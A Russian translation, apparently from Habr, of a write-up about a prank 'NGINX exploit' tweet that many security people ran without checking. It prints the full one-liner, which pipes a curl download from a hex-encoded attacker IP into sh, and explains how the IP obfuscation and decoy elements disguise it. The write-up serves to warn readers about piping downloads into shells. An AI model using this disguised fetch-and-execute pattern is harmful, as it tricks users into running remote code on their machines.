Хабрахабр

[Перевод] Успех социального эксперимента с поддельным эксплойтом для nginx

Прим. перев.: Автор оригинальной заметки, опубликованной 1 июня, решил провести эксперимент в среде интересующихся информационной безопасностью. Для этого он подготовил поддельный эксплойт к нераскрытой уязвимости в веб-сервере и разместил его в своём твиттере. Его предположения — быть мгновенно разоблачённым специалистами, которые увидят очевидный обман в коде, — не просто не оправдались… Они превзошли все ожидания, причём в обратную сторону: твит получил огромную поддержку от многочисленных людей, которые не стали проверять его содержимое.

Это отличный способ утратить контроль над компьютером. TL;DR: ни в коем случае не используйте конвейеризацию файлов в sh или bash.

Он появился оперативно в ответ на новость от Alisa Esage Шевченко, члена Zero Day Initiative (ZDI), о том, что скоро будет раскрыта информация об уязвимости в NGINX, приводящей к RCE (удаленному исполнению кода). Хочу поделиться с вами небольшой историей о шуточном PoC-эксплойте, который был создан 31 мая. Но из-за задержек в процессе «ответственного раскрытия» информации подробности произошедшего не были известны — такова стандартная процедура ZDI. Поскольку NGINX лежит в основе многих веб-сайтов, новость должна была произвести эффект разорвавшейся бомбы.


Твит о раскрытии уязвимости в NGINX

Конечно, это была полная ерунда. Закончив работу над новой техникой обфускации в curl, я процитировал оригинальный твит и «слил рабочий PoC», состоящий из одной строки кода, якобы использующей обнаруженную уязвимость. Я полагал, что меня сразу выведут на чистую воду, и что в лучшем случае я получу пару ретвитов (ну и ладно).


Твит с поддельным эксплойтом

Популярность моего твита взлетела до небес. Однако я не мог представить себе того, что произошло дальше. Многие ретвитят его вообще без проверки (не говоря уже о том, чтобы полюбоваться прелестной ASCII-графикой, которую он выводит). Удивительно, но на данный момент (15:00 МСК 1 июня) до сих пор мало кто осознал, что это фальшивка.


Только посмотрите, какая красота!

К счастью, браузеры работают аналогично, и в сочетании с фактом, что проблемы с законом мне вовсе не нужны, код, запрятанный в моем сайте, всего лишь делал вызовы echo, не пытаясь устанавливать или выполнять какой бы то ни было дополнительный код. Хоть все эти циклы и цвета замечательны, понятное дело: чтобы их увидеть, люди выполняли код на своей машине.

netspooky и dnz обнаружили несколько новых способов, показавшихся мне чрезвычайно перспективными. Небольшое отступление: netspooky, dnz, я и другие парни из команды Thugcrowd уже некоторое время играем с различными способами обфускации curl-команд, потому что это прикольно… и мы гики. Оказалось, что IP также можно конвертировать в шестнадцатеричный формат. Я присоединился к веселью и попробовал добавить IP-десятичные преобразования к набору уловок. Таким образом, требовалось просто создать убедительную и безопасно выглядящую командную строку. Более того, curl и большинство других NIX-инструментов с удовольствием «кушают» шестнадцатеричные IP! В конечном итоге я остановился на этой:

curl -gsS https://127.0.0.1-OR-VICTIM-SERVER:443/../../../%00/nginx-handler?/usr/lib/nginx/modules/ngx_stream_module.so:127.0.0.1:80:/bin/sh%00\<'protocol:TCP' -O 0x0238f06a#PLToffset |sh; nc /dev/tcp/localhost

Социо-электронная инженерия (S.E.E.) — больше, чем просто фишинг

Безопасность и привычность были основной частью этого эксперимента. Думаю, именно они привели к его успеху. Командная строка явно подразумевала безопасность, ссылаясь на «127.0.0.1» (всем известный localhost). Считается, что localhost безопасен, а данные на нем никогда не покидают ваш компьютер.

E. Привычность была вторым ключевым S. -компонентом эксперимента. E. Заимствование элементов старых эксплойт-концепций и их комбинирование необычным способом оказалось весьма успешным. Поскольку целевая аудитория преимущественно состояла из людей, знакомых с основами компьютерной безопасности, важно было создать такой код, чтобы его части казались знакомыми и привычными (а потому безопасными).

Все в этом списке носит косметический характер, а для его реальной работы практически ничего не требуется. Ниже приведен подробный разбор однострочника.

Это -gsS, -O 0x0238f06a, |sh и сам веб-сервер. Какие же компоненты действительно необходимы? Когда пользователь вводил строку с |sh в середине, index.html загружался и выполнялся. Веб-сервер не содержал никаких злонамеренных инструкций, а просто передавал ASCII-графику с помощью команд echo в скрипте, содержащемся в index.html. К счастью, хранители веб-сервера не имели злых намерений.

  • ../../../%00 — изображает выход за пределы директории;
  • ngx_stream_module.so — путь к случайному модулю NGINX;
  • /bin/sh%00\<'protocol:TCP' — мы якобы запускаем /bin/sh на целевой машине и перенаправляем вывод в TCP-канал;
  • -O 0x0238f06a#PLToffset — секретный ингредиент, дополненный #PLToffset, чтобы выглядеть как смещение памяти, каким-то образом содержащееся в PLT;
  • |sh; — еще один важный фрагмент. Нам было нужно перенаправить вывод в sh/bash, чтобы выполнить код, поступающий с атакующего веб-сервера, расположенного по адресу 0x0238f06a (2.56.240.x);
  • nc /dev/tcp/localhost — пустышка, в которой netcat ссылается на /dev/tcp/localhost, чтобы все опять выглядело безопасно. На самом же деле, ничего не делает и включен в строку для красоты.

На этом заканчиваются расшифровка однострочного скрипта и обсуждение аспектов «социо-электронной инженерии» (затейливого фишинга).

Конфигурация веб-сервера и меры противодействия

Поскольку подавляющее большинство моих подписчиков — инфобезопасники/хакеры, я решил сделать веб-сервер чуть более устойчивым к проявлениям «интереса» с их стороны просто для того, чтобы ребятам было чем заняться (да и настраивать его было прикольно). Я не собираюсь здесь перечислять все ловушки, поскольку эксперимент все еще продолжается, но вот несколько вещей, которые сервер делает:

  • Активно отслеживает попытки распространения в определенных социальных сетях и подставляет различные миниатюры предпросмотра, чтобы побудить пользователя перейти по ссылке.
  • Перенаправляет Chrome/Mozilla/Safari/и т. д. на промо-ролик Thugcrowd вместо того, чтобы показать скрипт shell.
  • Следит за ЯВНЫМИ признаками вторжения/грубого взлома, после чего начинает перенаправлять запросы на серверы АНБ (ха!).
  • Устанавливает троян, а также BIOS rootkit на все компьютеры, пользователи которых посещают хост с обычного браузера (шутка!).


Небольшая часть антимер

В данном случае моей единственной целью было освоение некоторых возможностей Apache — в частности, клевых правил перенаправления запросов, — и я подумал: а почему бы и нет?

Эксплойт NGINX (настоящий!)

Подписывайтесь на @alisaesage в Твиттере и следите за замечательной работой ZDI по устранению вполне реальных уязвимостей и возможностей для эксплойтов в NGINX. Их работа всегда завораживала меня и я благодарен Алисе за терпение, связанное со всеми упоминаниями и уведомлениями, вызванными моим дурацким твитом. К счастью, он принес и некоторую пользу: помог повысить осведомленность об уязвимостях NGINX, а также о проблемах, вызываемых злоупотреблением curl'ом.

Теги
Показать больше

Похожие статьи

Добавить комментарий

Ваш e-mail не будет опубликован. Обязательные поля помечены *

Кнопка «Наверх»
Закрыть